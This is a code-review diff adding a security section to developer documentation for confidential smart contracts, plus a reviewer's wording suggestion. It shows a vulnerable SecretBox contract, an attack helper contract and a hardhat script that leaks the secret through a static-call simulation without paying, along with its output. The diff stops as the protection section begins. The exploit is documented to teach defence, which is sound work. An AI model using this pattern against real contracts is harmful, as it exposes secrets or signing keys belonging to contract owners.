docs/develop/security.md

```diff
@@ -4,10 +4,178 @@ description: Recipes for Confidentiality, Security considerations when writing c
+
+```solidity title="SecretBox.sol"
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+contract SecretBox {
+  address public immutable owner;
+
+  uint256 public immutable DEPOSIT_AMOUNT;
+  string private secret;
+  address private payer;
+
+  constructor(uint256 amount) {
+    owner = msg.sender;
+    DEPOSIT_AMOUNT = amount;
+  }
+
+  function setSecret(string calldata s) external {
+    require(msg.sender == owner, "not owner");
+    secret = s;
+  }
+
+  function getSecret() external view returns (string memory) {
+    require(msg.sender == payer, "not payer");
+    return secret;
+  }
+
+  receive() external payable {
+    require(msg.value >= DEPOSIT_AMOUNT, "amount too low");
+    payer = msg.sender;
+  }
+}
+```
+
+The same principle can be applied to encumbered wallets, gasless transactions
+and cross-chain DeFi contracts where the `secret` is a signing key for
+transactions and `getSecret()` generates a signed transaction and returns it 
+to the user for submission.
+
+The *simulation attack* can leak the secret above without user sending any 
+assets to the `SecretBox` contract. The attacker can use the following helper
+contract:
+
+```solidity title="SecretBoxAttack.sol"
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import { SecretBox } from "./SecretBox.sol";
+
+contract SecretBoxAttack {
+  address private attacker;
+
+  function getSecret(address secretBoxAddr) external returns (string memory) {
+    SecretBox sb = SecretBox(payable(secretBoxAddr));
+    secretBoxAddr.call{value: address(this).balance}("");
+    return sb.getSecret();
+  }
+
+  receive() external payable {
+    require(attacker == address(0), "already paid");
+    attacker = msg.sender;
+  }
+
+  function withdraw() external {
+    payable(attacker).transfer(address(this).balance);
+  }
+}
+```
+
+The attacker then sends funds to the helper contract, simulates the
+`getSecret()` call to obtain the secret and withdraws the funds back:
+
+```typescript title="attackSecretBox.ts"
+import { ethers } from 'hardhat'
+
+const SecretBox = await ethers.getContractFactory(
+        'SecretBox'
+)
+const sb = await SecretBox.deploy(1_000_000_000)
+await sb.waitForDeployment()
+
+const secretTx = await sb.setSecret("very secret message");
+await secretTx.wait()
+
+const SecretBoxAttack = await ethers.getContractFactory(
+        'SecretBoxAttack'
+)
+const sba = await SecretBoxAttack.deploy()
+await sba.waitForDeployment()
+
+const transferTx = await(await ethers.getSigners())[0].sendTransaction({
+  to: await sba.getAddress(),
+  value: 1_000_000_000,
+})
+await transferTx.wait()
+
+const secret = await sba.getSecret.staticCall(await sb.getAddress())
+console.log(`Secret: ${secret}`)
+
+const withdrawTx = await sba.withdraw()
+await withdrawTx.wait()
+```
+
+Running the script above will leak the secret:
+
+```
+Secret: very secret message
+```
+
+### Protection
+
+The Ethereum virtual machine was designed in a way that you cannot detect 
```

Comment:
Maybe clearer:

"The design of the Ethereum Virtual Machine is such that a smart contract cannot detect whether it is being executed within a finalized transaction vs a static call..."